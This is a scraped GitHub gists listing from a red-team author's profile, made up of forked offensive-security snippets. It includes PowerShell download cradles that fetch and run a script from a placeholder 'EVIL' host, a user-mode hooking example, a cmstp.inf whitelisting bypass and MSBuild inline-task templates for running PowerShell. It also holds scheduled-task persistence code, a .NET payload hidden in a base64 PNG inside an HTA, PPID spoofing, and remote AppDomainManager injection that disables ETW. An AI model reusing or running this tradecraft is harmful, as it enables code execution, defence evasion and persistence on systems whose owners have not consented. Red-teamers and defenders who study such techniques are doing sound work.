Skip to content

Instantly share code, notes, and snippets.

View ConsciousHacker's full-sized avatar

Chris "Lopi" Spehn ConsciousHacker

264 followers · 22 following
View GitHub Profile
@ConsciousHacker
ConsciousHacker / DownloadCradles.ps1
Created November 13, 2017 21:41 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@ConsciousHacker
ConsciousHacker / Injectable.cpp
Created December 18, 2017 18:41 — forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
#include <windows.h>
#include <stdio.h>
FARPROC fpCreateProcessW;
BYTE bSavedByte;
// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe
@ConsciousHacker
ConsciousHacker / cmstp.inf
Created January 30, 2018 21:49 — forked from NickTyrer/cmstp.inf
;cmstp.exe cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
@ConsciousHacker
ConsciousHacker / pshell_template_embedded_script.xml
Created February 2, 2018 22:46 — forked from jbarcia/pshell_template_embedded_script.xml
MSBuild Powershell Script XML template
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
</PropertyGroup>
<Target Name="Hello">
@ConsciousHacker
ConsciousHacker / pshell_template_embedded_script.xml
Created February 2, 2018 22:46 — forked from xorrior/pshell_template_embedded_script.xml
MSBuild Powershell Script XML template
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
</PropertyGroup>
<Target Name="Hello">
@ConsciousHacker
ConsciousHacker / COM-ScheduledTasks.ps1
Created October 19, 2018 17:20 — forked from thed06/COM-ScheduledTasks.ps1
Scheduled Tasks in PowerShell Version 2 via Schedule.Service COM Object
function Install-ScheduledTask {
<#
.SYNOPSIS
Install a scheduled task using Schedule.Service COM object.
.DESCRIPTION
This function installs a scheduled task using Schedule.Service COM object.
.PARAMETER TaskPath
String. The path of the task.
.PARAMETER TaskName
@ConsciousHacker
ConsciousHacker / poc.png
Created May 22, 2019 04:09
MSBuild - Property functions -
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@ConsciousHacker
ConsciousHacker / honeybadger.hta
Created May 23, 2019 20:41
HoneyBadger PNG - .NET Assembly Bypass
<html>
<img id="HoneyBadger" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABAAAAAKtCAIAAAA2LYveAAAACXBIWXMAAA7zAAAO8wEcU5k6AAAAEXRFWHRUaXRsZQBQREYgQ3JlYXRvckFevCgAAAATdEVYdEF1dGhvcgBQREYgVG9vbHMgQUcbz3cwAAAALXpUWHREZXNjcmlwdGlvbgAACJnLKCkpsNLXLy8v1ytISdMtyc/PKdZLzs8FAG6fCPGXryy4AAovrklEQVR42ty9i5bjSJIsFgGAZGZWVnX1vFa60tmj/z/6CR19ymp1R3dmerrrkZl8ACFztwiH40kwM6tnJW5PLZMEgXghYO5ubh7/z//jfw8hxOELn1RVFeZedZBvU0r2iX8/ffFs09fSr6qY1o+fXLqz9/yK/3ZdZ+8H/3Yn+9NeK5eIYTfbWfbLfm7dvHQt39tI2ldx8uL5l8Z/cFg5Cfu1MBRz81Kt9W7uPNG3x/d0dl7asDb76/M4bfP0yLbM49Jho3a2C+ttaR0uvTDO/if9RLcd3nT6Gk3c7Hl27vM4eT9dnzzlaApWzhAXzs8/67qu9GVfHbt73Nl1HSv8l7q2O3btpW3P6A5WirShi2WkZQdomtPsDdK27agB/PZY53VbxUav3OjVK/7ZNHv8o8s+H3Zpa54BDcA5bXnjYH9z8b1OyvPlcsF7fti2id3UraPe6atpGn6FI4/P3/EnD8D5tUfywq9affFU1oUmHvNC0hdbUsurmV9XOhQ8Unpdc6m0bD+6Jf/Grp/xC4elYpfxwsHlXN1wPejnqSlLBWfBDFW4QVOsOu7DEbPI3kXsPDjb8dxyQPDv+Xw+nS7YsXe7g05nbJrdfr9v6n3u/uXy9PKNS/3u7u5wOKCvGDR88/z8HEOtUyYvncQaDau6c3kSVFxdsmGkqk3dk77w+ePj44cPH5qd7JzpdNQ+5hfOjFbhX1xOxrSRUcUnuNzxeMSlcSg+5ySi
@ConsciousHacker
ConsciousHacker / PPID Spoof & BlockDLLs
Created January 24, 2020 20:18 — forked from rasta-mouse/PPID Spoof & BlockDLLs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
@ConsciousHacker
ConsciousHacker / README.md
Created September 1, 2020 20:58 — forked from byt3bl33d3r/README.md
Remote AppDomainManager Injection

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

  1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
  2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
  3. Host test.dll on a remote SMB or HTTP(S) server